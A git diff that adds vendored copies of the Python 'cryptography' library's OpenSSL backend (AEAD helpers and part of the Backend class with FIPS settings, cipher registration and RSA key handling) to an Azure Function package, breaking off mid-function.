a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed25519.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed25519.cpython-39.pyc new file mode 100644 index 0000000..76b0320 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed25519.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed448.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed448.cpython-39.pyc new file mode 100644 index 0000000..6cabce4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed448.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/encode_asn1.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/encode_asn1.cpython-39.pyc new file mode 100644 index 0000000..1ac7c31 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/encode_asn1.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hashes.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hashes.cpython-39.pyc new file mode 100644 index 0000000..53cd8af Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hashes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hmac.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hmac.cpython-39.pyc new file mode 100644 index 0000000..58dbc1e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hmac.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/poly1305.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/poly1305.cpython-39.pyc new file mode 100644 index 0000000..d1f850a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/poly1305.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/rsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/rsa.cpython-39.pyc new file mode 100644 index 0000000..bf12e80 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/rsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..92f5aec Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x25519.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x25519.cpython-39.pyc new file mode 100644 index 0000000..6c07a33 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x25519.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x448.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x448.cpython-39.pyc new file mode 100644 index 0000000..074ff37 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x448.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x509.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x509.cpython-39.pyc new file mode 100644 index 0000000..40ef203 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x509.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/aead.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/aead.py new file mode 100644 index 0000000..68835da --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/aead.py @@ -0,0 +1,251 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import InvalidTag + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + from cryptography.hazmat.primitives.ciphers.aead import ( + AESCCM, + AESGCM, + AESOCB3, + AESSIV, + ChaCha20Poly1305, + ) + + _AEAD_TYPES = typing.Union[ + AESCCM, AESGCM, AESOCB3, AESSIV, ChaCha20Poly1305 + ] + +_ENCRYPT = 1 +_DECRYPT = 0 + + +def _aead_cipher_name(cipher: "_AEAD_TYPES") -> bytes: + from cryptography.hazmat.primitives.ciphers.aead import ( + AESCCM, + AESGCM, + AESOCB3, + AESSIV, + ChaCha20Poly1305, + ) + + if isinstance(cipher, ChaCha20Poly1305): + return b"chacha20-poly1305" + elif isinstance(cipher, AESCCM): + return f"aes-{len(cipher._key) * 8}-ccm".encode("ascii") + elif isinstance(cipher, AESOCB3): + return f"aes-{len(cipher._key) * 8}-ocb".encode("ascii") + elif isinstance(cipher, AESSIV): + return f"aes-{len(cipher._key) * 8 // 2}-siv".encode("ascii") + else: + assert isinstance(cipher, AESGCM) + return f"aes-{len(cipher._key) * 8}-gcm".encode("ascii") + + +def _evp_cipher(cipher_name: bytes, backend: "Backend"): + if cipher_name.endswith(b"-siv"): + evp_cipher = backend._lib.EVP_CIPHER_fetch( + backend._ffi.NULL, + cipher_name, + backend._ffi.NULL, + ) + backend.openssl_assert(evp_cipher != backend._ffi.NULL) + evp_cipher = backend._ffi.gc(evp_cipher, backend._lib.EVP_CIPHER_free) + else: + evp_cipher = backend._lib.EVP_get_cipherbyname(cipher_name) + backend.openssl_assert(evp_cipher != backend._ffi.NULL) + + return evp_cipher + + +def _aead_setup( + backend: "Backend", + cipher_name: bytes, + key: bytes, + nonce: bytes, + tag: typing.Optional[bytes], + tag_len: int, + operation: int, +): + evp_cipher = _evp_cipher(cipher_name, backend) + ctx = backend._lib.EVP_CIPHER_CTX_new() + ctx = backend._ffi.gc(ctx, backend._lib.EVP_CIPHER_CTX_free) + res = backend._lib.EVP_CipherInit_ex( + ctx, + evp_cipher, + backend._ffi.NULL, + backend._ffi.NULL, + backend._ffi.NULL, + int(operation == _ENCRYPT), + ) + backend.openssl_assert(res != 0) + res = backend._lib.EVP_CIPHER_CTX_set_key_length(ctx, len(key)) + backend.openssl_assert(res != 0) + res = 
backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, + backend._lib.EVP_CTRL_AEAD_SET_IVLEN, + len(nonce), + backend._ffi.NULL, + ) + backend.openssl_assert(res != 0) + if operation == _DECRYPT: + assert tag is not None + res = backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, backend._lib.EVP_CTRL_AEAD_SET_TAG, len(tag), tag + ) + backend.openssl_assert(res != 0) + elif cipher_name.endswith(b"-ccm"): + res = backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, backend._lib.EVP_CTRL_AEAD_SET_TAG, tag_len, backend._ffi.NULL + ) + backend.openssl_assert(res != 0) + + nonce_ptr = backend._ffi.from_buffer(nonce) + key_ptr = backend._ffi.from_buffer(key) + res = backend._lib.EVP_CipherInit_ex( + ctx, + backend._ffi.NULL, + backend._ffi.NULL, + key_ptr, + nonce_ptr, + int(operation == _ENCRYPT), + ) + backend.openssl_assert(res != 0) + return ctx + + +def _set_length(backend: "Backend", ctx, data_len: int) -> None: + intptr = backend._ffi.new("int *") + res = backend._lib.EVP_CipherUpdate( + ctx, backend._ffi.NULL, intptr, backend._ffi.NULL, data_len + ) + backend.openssl_assert(res != 0) + + +def _process_aad(backend: "Backend", ctx, associated_data: bytes) -> None: + outlen = backend._ffi.new("int *") + res = backend._lib.EVP_CipherUpdate( + ctx, backend._ffi.NULL, outlen, associated_data, len(associated_data) + ) + backend.openssl_assert(res != 0) + + +def _process_data(backend: "Backend", ctx, data: bytes) -> bytes: + outlen = backend._ffi.new("int *") + buf = backend._ffi.new("unsigned char[]", len(data)) + res = backend._lib.EVP_CipherUpdate(ctx, buf, outlen, data, len(data)) + if res == 0: + # AES SIV can error here if the data is invalid on decrypt + backend._consume_errors() + raise InvalidTag + return backend._ffi.buffer(buf, outlen[0])[:] + + +def _encrypt( + backend: "Backend", + cipher: "_AEAD_TYPES", + nonce: bytes, + data: bytes, + associated_data: typing.List[bytes], + tag_length: int, +) -> bytes: + from cryptography.hazmat.primitives.ciphers.aead import AESCCM, AESSIV + + cipher_name = _aead_cipher_name(cipher) + ctx = _aead_setup( + backend, cipher_name, cipher._key, nonce, None, tag_length, _ENCRYPT + ) + # CCM requires us to pass the length of the data before processing anything + # However calling this with any other AEAD results in an error + if isinstance(cipher, AESCCM): + _set_length(backend, ctx, len(data)) + + for ad in associated_data: + _process_aad(backend, ctx, ad) + processed_data = _process_data(backend, ctx, data) + outlen = backend._ffi.new("int *") + # All AEADs we support besides OCB are streaming so they return nothing + # in finalization. OCB can return up to (16 byte block - 1) bytes so + # we need a buffer here too. + buf = backend._ffi.new("unsigned char[]", 16) + res = backend._lib.EVP_CipherFinal_ex(ctx, buf, outlen) + backend.openssl_assert(res != 0) + processed_data += backend._ffi.buffer(buf, outlen[0])[:] + tag_buf = backend._ffi.new("unsigned char[]", tag_length) + res = backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, backend._lib.EVP_CTRL_AEAD_GET_TAG, tag_length, tag_buf + ) + backend.openssl_assert(res != 0) + tag = backend._ffi.buffer(tag_buf)[:] + + if isinstance(cipher, AESSIV): + # RFC 5297 defines the output as IV || C, where the tag we generate is + # the "IV" and C is the ciphertext. 
This is the opposite of our + # other AEADs, which are Ciphertext || Tag + backend.openssl_assert(len(tag) == 16) + return tag + processed_data + else: + return processed_data + tag + + +def _decrypt( + backend: "Backend", + cipher: "_AEAD_TYPES", + nonce: bytes, + data: bytes, + associated_data: typing.List[bytes], + tag_length: int, +) -> bytes: + from cryptography.hazmat.primitives.ciphers.aead import AESCCM, AESSIV + + if len(data) < tag_length: + raise InvalidTag + + if isinstance(cipher, AESSIV): + # RFC 5297 defines the output as IV || C, where the tag we generate is + # the "IV" and C is the ciphertext. This is the opposite of our + # other AEADs, which are Ciphertext || Tag + tag = data[:tag_length] + data = data[tag_length:] + else: + tag = data[-tag_length:] + data = data[:-tag_length] + cipher_name = _aead_cipher_name(cipher) + ctx = _aead_setup( + backend, cipher_name, cipher._key, nonce, tag, tag_length, _DECRYPT + ) + # CCM requires us to pass the length of the data before processing anything + # However calling this with any other AEAD results in an error + if isinstance(cipher, AESCCM): + _set_length(backend, ctx, len(data)) + + for ad in associated_data: + _process_aad(backend, ctx, ad) + # CCM has a different error path if the tag doesn't match. Errors are + # raised in Update and Final is irrelevant. + if isinstance(cipher, AESCCM): + outlen = backend._ffi.new("int *") + buf = backend._ffi.new("unsigned char[]", len(data)) + res = backend._lib.EVP_CipherUpdate(ctx, buf, outlen, data, len(data)) + if res != 1: + backend._consume_errors() + raise InvalidTag + + processed_data = backend._ffi.buffer(buf, outlen[0])[:] + else: + processed_data = _process_data(backend, ctx, data) + outlen = backend._ffi.new("int *") + # OCB can return up to 15 bytes (16 byte block - 1) in finalization + buf = backend._ffi.new("unsigned char[]", 16) + res = backend._lib.EVP_CipherFinal_ex(ctx, buf, outlen) + processed_data += backend._ffi.buffer(buf, outlen[0])[:] + if res == 0: + backend._consume_errors() + raise InvalidTag + + return processed_data diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/backend.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/backend.py new file mode 100644 index 0000000..89371a6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/backend.py @@ -0,0 +1,2537 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
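The _encrypt/_decrypt helpers above emit Ciphertext || Tag, with AES-SIV as the RFC 5297 exception (Tag || Ciphertext). Through the public AEAD classes, that layout looks like this (a sketch with AESGCM and its 16-byte tag):

import os

from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=128)
aead = AESGCM(key)
nonce = os.urandom(12)
ct = aead.encrypt(nonce, b"secret", b"header")  # ciphertext followed by 16-byte tag
assert len(ct) == len(b"secret") + 16
assert aead.decrypt(nonce, ct, b"header") == b"secret"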
+ + +import collections +import contextlib +import itertools +import typing +import warnings +from contextlib import contextmanager + +from cryptography import utils, x509 +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.backends.openssl import aead +from cryptography.hazmat.backends.openssl.ciphers import _CipherContext +from cryptography.hazmat.backends.openssl.cmac import _CMACContext +from cryptography.hazmat.backends.openssl.dh import ( + _DHParameters, + _DHPrivateKey, + _DHPublicKey, + _dh_params_dup, +) +from cryptography.hazmat.backends.openssl.dsa import ( + _DSAParameters, + _DSAPrivateKey, + _DSAPublicKey, +) +from cryptography.hazmat.backends.openssl.ec import ( + _EllipticCurvePrivateKey, + _EllipticCurvePublicKey, +) +from cryptography.hazmat.backends.openssl.ed25519 import ( + _Ed25519PrivateKey, + _Ed25519PublicKey, +) +from cryptography.hazmat.backends.openssl.ed448 import ( + _ED448_KEY_SIZE, + _Ed448PrivateKey, + _Ed448PublicKey, +) +from cryptography.hazmat.backends.openssl.hashes import _HashContext +from cryptography.hazmat.backends.openssl.hmac import _HMACContext +from cryptography.hazmat.backends.openssl.poly1305 import ( + _POLY1305_KEY_SIZE, + _Poly1305Context, +) +from cryptography.hazmat.backends.openssl.rsa import ( + _RSAPrivateKey, + _RSAPublicKey, +) +from cryptography.hazmat.backends.openssl.x25519 import ( + _X25519PrivateKey, + _X25519PublicKey, +) +from cryptography.hazmat.backends.openssl.x448 import ( + _X448PrivateKey, + _X448PublicKey, +) +from cryptography.hazmat.bindings._rust import ( + x509 as rust_x509, +) +from cryptography.hazmat.bindings.openssl import binding +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives._asymmetric import AsymmetricPadding +from cryptography.hazmat.primitives.asymmetric import ( + dh, + dsa, + ec, + ed25519, + ed448, + rsa, + x25519, + x448, +) +from cryptography.hazmat.primitives.asymmetric.padding import ( + MGF1, + OAEP, + PKCS1v15, + PSS, +) +from cryptography.hazmat.primitives.asymmetric.types import ( + CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES, + PRIVATE_KEY_TYPES, + PUBLIC_KEY_TYPES, +) +from cryptography.hazmat.primitives.ciphers import ( + BlockCipherAlgorithm, + CipherAlgorithm, +) +from cryptography.hazmat.primitives.ciphers.algorithms import ( + AES, + ARC4, + Camellia, + ChaCha20, + SM4, + TripleDES, + _BlowfishInternal, + _CAST5Internal, + _IDEAInternal, + _SEEDInternal, +) +from cryptography.hazmat.primitives.ciphers.modes import ( + CBC, + CFB, + CFB8, + CTR, + ECB, + GCM, + Mode, + OFB, + XTS, +) +from cryptography.hazmat.primitives.kdf import scrypt +from cryptography.hazmat.primitives.serialization import pkcs7, ssh +from cryptography.hazmat.primitives.serialization.pkcs12 import ( + PKCS12Certificate, + PKCS12KeyAndCertificates, + _ALLOWED_PKCS12_TYPES, + _PKCS12_CAS_TYPES, +) + + +_MemoryBIO = collections.namedtuple("_MemoryBIO", ["bio", "char_ptr"]) + + +# Not actually supported, just used as a marker for some serialization tests. +class _RC2: + pass + + +class Backend: + """ + OpenSSL API binding interfaces. + """ + + name = "openssl" + + # FIPS has opinions about acceptable algorithms and key sizes, but the + # disallowed algorithms are still present in OpenSSL. They just error if + # you try to use them. To avoid that we allowlist the algorithms in + # FIPS 140-3. This isn't ideal, but FIPS 140-3 is trash so here we are. 
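# Concretely (illustrative only): with _fips_enabled set, the checks in
# cipher_supported() below reject anything that is not AES via
# _fips_ciphers, and only the aes-*-ccm / aes-*-gcm names listed in
# _fips_aead remain usable for AEAD.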
_fips_aead = { + b"aes-128-ccm", + b"aes-192-ccm", + b"aes-256-ccm", + b"aes-128-gcm", + b"aes-192-gcm", + b"aes-256-gcm", + } + # TripleDES encryption is disallowed/deprecated throughout 2023 in + # FIPS 140-3. To keep it simple we denylist any use of TripleDES (TDEA). + _fips_ciphers = (AES,) + # Sometimes SHA1 is still permissible. That logic is contained + # within the various *_supported methods. + _fips_hashes = ( + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, + hashes.SHA512_224, + hashes.SHA512_256, + hashes.SHA3_224, + hashes.SHA3_256, + hashes.SHA3_384, + hashes.SHA3_512, + hashes.SHAKE128, + hashes.SHAKE256, + ) + _fips_ecdh_curves = ( + ec.SECP224R1, + ec.SECP256R1, + ec.SECP384R1, + ec.SECP521R1, + ) + _fips_rsa_min_key_size = 2048 + _fips_rsa_min_public_exponent = 65537 + _fips_dsa_min_modulus = 1 << 2048 + _fips_dh_min_key_size = 2048 + _fips_dh_min_modulus = 1 << _fips_dh_min_key_size + + def __init__(self): + self._binding = binding.Binding() + self._ffi = self._binding.ffi + self._lib = self._binding.lib + self._rsa_skip_check_key = False + self._fips_enabled = self._is_fips_enabled() + + self._cipher_registry = {} + self._register_default_ciphers() + if self._fips_enabled and self._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE: + warnings.warn( + "OpenSSL FIPS mode is enabled. Can't enable DRBG fork safety.", + UserWarning, + ) + else: + self.activate_osrandom_engine() + self._dh_types = [self._lib.EVP_PKEY_DH] + if self._lib.Cryptography_HAS_EVP_PKEY_DHX: + self._dh_types.append(self._lib.EVP_PKEY_DHX) + + def __repr__(self) -> str: + return "<OpenSSLBackend(version: {}, FIPS: {})>".format( + self.openssl_version_text(), self._fips_enabled + ) + + def openssl_assert( + self, + ok: bool, + errors: typing.Optional[typing.List[binding._OpenSSLError]] = None, + ) -> None: + return binding._openssl_assert(self._lib, ok, errors=errors) + + def _is_fips_enabled(self) -> bool: + if self._lib.Cryptography_HAS_300_FIPS: + mode = self._lib.EVP_default_properties_is_fips_enabled( + self._ffi.NULL + ) + else: + mode = getattr(self._lib, "FIPS_mode", lambda: 0)() + + if mode == 0: + # OpenSSL without FIPS pushes an error on the error stack + self._lib.ERR_clear_error() + return bool(mode) + + def _enable_fips(self) -> None: + # This function enables FIPS mode for OpenSSL 3.0.0 on installs that + # have the FIPS provider installed properly. + self._binding._enable_fips() + assert self._is_fips_enabled() + self._fips_enabled = self._is_fips_enabled() + + def activate_builtin_random(self) -> None: + if self._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE: + # Obtain a new structural reference. + e = self._lib.ENGINE_get_default_RAND() + if e != self._ffi.NULL: + self._lib.ENGINE_unregister_RAND(e) + # Reset the RNG to use the built-in. + res = self._lib.RAND_set_rand_method(self._ffi.NULL) + self.openssl_assert(res == 1) + # decrement the structural reference from get_default_RAND + res = self._lib.ENGINE_finish(e) + self.openssl_assert(res == 1) + + @contextlib.contextmanager + def _get_osurandom_engine(self): + # Fetches an engine by id and returns it. This creates a structural + # reference. + e = self._lib.ENGINE_by_id(self._lib.Cryptography_osrandom_engine_id) + self.openssl_assert(e != self._ffi.NULL) + # Initialize the engine for use. This adds a functional reference. + res = self._lib.ENGINE_init(e) + self.openssl_assert(res == 1) + + try: + yield e + finally: + # Decrement the structural ref incremented by ENGINE_by_id.
+ res = self._lib.ENGINE_free(e) + self.openssl_assert(res == 1) + # Decrement the functional ref incremented by ENGINE_init. + res = self._lib.ENGINE_finish(e) + self.openssl_assert(res == 1) + + def activate_osrandom_engine(self) -> None: + if self._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE: + # Unregister and free the current engine. + self.activate_builtin_random() + with self._get_osurandom_engine() as e: + # Set the engine as the default RAND provider. + res = self._lib.ENGINE_set_default_RAND(e) + self.openssl_assert(res == 1) + # Reset the RNG to use the engine + res = self._lib.RAND_set_rand_method(self._ffi.NULL) + self.openssl_assert(res == 1) + + def osrandom_engine_implementation(self) -> str: + buf = self._ffi.new("char[]", 64) + with self._get_osurandom_engine() as e: + res = self._lib.ENGINE_ctrl_cmd( + e, b"get_implementation", len(buf), buf, self._ffi.NULL, 0 + ) + self.openssl_assert(res > 0) + return self._ffi.string(buf).decode("ascii") + + def openssl_version_text(self) -> str: + """ + Friendly string name of the loaded OpenSSL library. This is not + necessarily the same version as it was compiled against. + + Example: OpenSSL 1.1.1d 10 Sep 2019 + """ + return self._ffi.string( + self._lib.OpenSSL_version(self._lib.OPENSSL_VERSION) + ).decode("ascii") + + def openssl_version_number(self) -> int: + return self._lib.OpenSSL_version_num() + + def create_hmac_ctx( + self, key: bytes, algorithm: hashes.HashAlgorithm + ) -> _HMACContext: + return _HMACContext(self, key, algorithm) + + def _evp_md_from_algorithm(self, algorithm: hashes.HashAlgorithm): + if algorithm.name == "blake2b" or algorithm.name == "blake2s": + alg = "{}{}".format( + algorithm.name, algorithm.digest_size * 8 + ).encode("ascii") + else: + alg = algorithm.name.encode("ascii") + + evp_md = self._lib.EVP_get_digestbyname(alg) + return evp_md + + def _evp_md_non_null_from_algorithm(self, algorithm: hashes.HashAlgorithm): + evp_md = self._evp_md_from_algorithm(algorithm) + self.openssl_assert(evp_md != self._ffi.NULL) + return evp_md + + def hash_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + if self._fips_enabled and not isinstance(algorithm, self._fips_hashes): + return False + + evp_md = self._evp_md_from_algorithm(algorithm) + return evp_md != self._ffi.NULL + + def signature_hash_supported( + self, algorithm: hashes.HashAlgorithm + ) -> bool: + # Dedicated check for hashing algorithm use in message digest for + # signatures, e.g. RSA PKCS#1 v1.5 SHA1 (sha1WithRSAEncryption). + if self._fips_enabled and isinstance(algorithm, hashes.SHA1): + return False + return self.hash_supported(algorithm) + + def scrypt_supported(self) -> bool: + if self._fips_enabled: + return False + else: + return self._lib.Cryptography_HAS_SCRYPT == 1 + + def hmac_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + # FIPS mode still allows SHA1 for HMAC + if self._fips_enabled and isinstance(algorithm, hashes.SHA1): + return True + + return self.hash_supported(algorithm) + + def create_hash_ctx( + self, algorithm: hashes.HashAlgorithm + ) -> hashes.HashContext: + return _HashContext(self, algorithm) + + def cipher_supported(self, cipher: CipherAlgorithm, mode: Mode) -> bool: + if self._fips_enabled: + # FIPS mode requires AES. TripleDES is disallowed/deprecated in + # FIPS 140-3. 
+ if not isinstance(cipher, self._fips_ciphers): + return False + + try: + adapter = self._cipher_registry[type(cipher), type(mode)] + except KeyError: + return False + evp_cipher = adapter(self, cipher, mode) + return self._ffi.NULL != evp_cipher + + def register_cipher_adapter(self, cipher_cls, mode_cls, adapter): + if (cipher_cls, mode_cls) in self._cipher_registry: + raise ValueError( + "Duplicate registration for: {} {}.".format( + cipher_cls, mode_cls + ) + ) + self._cipher_registry[cipher_cls, mode_cls] = adapter + + def _register_default_ciphers(self) -> None: + for mode_cls in [CBC, CTR, ECB, OFB, CFB, CFB8, GCM]: + self.register_cipher_adapter( + AES, + mode_cls, + GetCipherByName("{cipher.name}-{cipher.key_size}-{mode.name}"), + ) + for mode_cls in [CBC, CTR, ECB, OFB, CFB]: + self.register_cipher_adapter( + Camellia, + mode_cls, + GetCipherByName("{cipher.name}-{cipher.key_size}-{mode.name}"), + ) + for mode_cls in [CBC, CFB, CFB8, OFB]: + self.register_cipher_adapter( + TripleDES, mode_cls, GetCipherByName("des-ede3-{mode.name}") + ) + self.register_cipher_adapter( + TripleDES, ECB, GetCipherByName("des-ede3") + ) + for mode_cls in [CBC, CFB, OFB, ECB]: + self.register_cipher_adapter( + _BlowfishInternal, mode_cls, GetCipherByName("bf-{mode.name}") + ) + for mode_cls in [CBC, CFB, OFB, ECB]: + self.register_cipher_adapter( + _SEEDInternal, mode_cls, GetCipherByName("seed-{mode.name}") + ) + for cipher_cls, mode_cls in itertools.product( + [_CAST5Internal, _IDEAInternal], + [CBC, OFB, CFB, ECB], + ): + self.register_cipher_adapter( + cipher_cls, + mode_cls, + GetCipherByName("{cipher.name}-{mode.name}"), + ) + self.register_cipher_adapter(ARC4, type(None), GetCipherByName("rc4")) + # We don't actually support RC2, this is just used by some tests. 
+ self.register_cipher_adapter(_RC2, type(None), GetCipherByName("rc2")) + self.register_cipher_adapter( + ChaCha20, type(None), GetCipherByName("chacha20") + ) + self.register_cipher_adapter(AES, XTS, _get_xts_cipher) + for mode_cls in [ECB, CBC, OFB, CFB, CTR]: + self.register_cipher_adapter( + SM4, mode_cls, GetCipherByName("sm4-{mode.name}") + ) + + def create_symmetric_encryption_ctx( + self, cipher: CipherAlgorithm, mode: Mode + ) -> _CipherContext: + return _CipherContext(self, cipher, mode, _CipherContext._ENCRYPT) + + def create_symmetric_decryption_ctx( + self, cipher: CipherAlgorithm, mode: Mode + ) -> _CipherContext: + return _CipherContext(self, cipher, mode, _CipherContext._DECRYPT) + + def pbkdf2_hmac_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + return self.hmac_supported(algorithm) + + def derive_pbkdf2_hmac( + self, + algorithm: hashes.HashAlgorithm, + length: int, + salt: bytes, + iterations: int, + key_material: bytes, + ) -> bytes: + buf = self._ffi.new("unsigned char[]", length) + evp_md = self._evp_md_non_null_from_algorithm(algorithm) + key_material_ptr = self._ffi.from_buffer(key_material) + res = self._lib.PKCS5_PBKDF2_HMAC( + key_material_ptr, + len(key_material), + salt, + len(salt), + iterations, + evp_md, + length, + buf, + ) + self.openssl_assert(res == 1) + return self._ffi.buffer(buf)[:] + + def _consume_errors(self) -> typing.List[binding._OpenSSLError]: + return binding._consume_errors(self._lib) + + def _consume_errors_with_text( + self, + ) -> typing.List[binding._OpenSSLErrorWithText]: + return binding._consume_errors_with_text(self._lib) + + def _bn_to_int(self, bn) -> int: + assert bn != self._ffi.NULL + self.openssl_assert(not self._lib.BN_is_negative(bn)) + + bn_num_bytes = self._lib.BN_num_bytes(bn) + bin_ptr = self._ffi.new("unsigned char[]", bn_num_bytes) + bin_len = self._lib.BN_bn2bin(bn, bin_ptr) + # A zero length means the BN has value 0 + self.openssl_assert(bin_len >= 0) + val = int.from_bytes(self._ffi.buffer(bin_ptr)[:bin_len], "big") + return val + + def _int_to_bn(self, num: int, bn=None): + """ + Converts a python integer to a BIGNUM. The returned BIGNUM will not + be garbage collected (to support adding them to structs that take + ownership of the object). Be sure to register it for GC if it will + be discarded after use. 
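    Typical pattern, mirroring generate_rsa_private_key below:

        bn = self._int_to_bn(public_exponent)
        bn = self._ffi.gc(bn, self._lib.BN_free)  # register for GC; discarded after use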
+ """ + assert bn is None or bn != self._ffi.NULL + + if bn is None: + bn = self._ffi.NULL + + binary = num.to_bytes(int(num.bit_length() / 8.0 + 1), "big") + bn_ptr = self._lib.BN_bin2bn(binary, len(binary), bn) + self.openssl_assert(bn_ptr != self._ffi.NULL) + return bn_ptr + + def generate_rsa_private_key( + self, public_exponent: int, key_size: int + ) -> rsa.RSAPrivateKey: + rsa._verify_rsa_parameters(public_exponent, key_size) + + rsa_cdata = self._lib.RSA_new() + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + + bn = self._int_to_bn(public_exponent) + bn = self._ffi.gc(bn, self._lib.BN_free) + + res = self._lib.RSA_generate_key_ex( + rsa_cdata, key_size, bn, self._ffi.NULL + ) + self.openssl_assert(res == 1) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + + return _RSAPrivateKey( + self, rsa_cdata, evp_pkey, self._rsa_skip_check_key + ) + + def generate_rsa_parameters_supported( + self, public_exponent: int, key_size: int + ) -> bool: + return ( + public_exponent >= 3 + and public_exponent & 1 != 0 + and key_size >= 512 + ) + + def load_rsa_private_numbers( + self, numbers: rsa.RSAPrivateNumbers + ) -> rsa.RSAPrivateKey: + rsa._check_private_key_components( + numbers.p, + numbers.q, + numbers.d, + numbers.dmp1, + numbers.dmq1, + numbers.iqmp, + numbers.public_numbers.e, 